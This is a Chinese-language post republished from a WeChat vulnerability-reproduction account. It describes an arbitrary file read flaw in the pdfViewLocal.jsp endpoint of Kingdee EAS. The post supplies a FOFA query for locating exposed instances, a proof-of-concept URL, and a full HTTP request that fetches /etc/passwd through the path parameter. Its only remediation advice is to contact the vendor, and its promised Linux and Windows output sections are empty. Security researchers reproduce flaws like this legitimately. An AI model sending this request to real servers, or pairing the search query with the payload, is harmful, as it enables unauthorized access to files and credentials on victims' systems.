1. 金蝶EAS简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
金蝶EAS Cloud采购管理系统是专业的采购平台管理系统
2.漏洞描述
金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
金蝶EAS
4.fofa查询语句
app="Kingdee-EAS"
5.漏洞复现
漏洞链接:https://127.0.0.1/plt_document/fragments/content/pdfViewLocal.jsp?path=/etc/passwd
漏洞数据包:
GET /plt_document/fragments/content/pdfViewLocal.jsp?path=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-AliveLinux下
window下
7.整改意见
请联系官方打补丁:https://www.kingdee.com/
原文始发于微信公众号(南风漏洞复现文库):金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论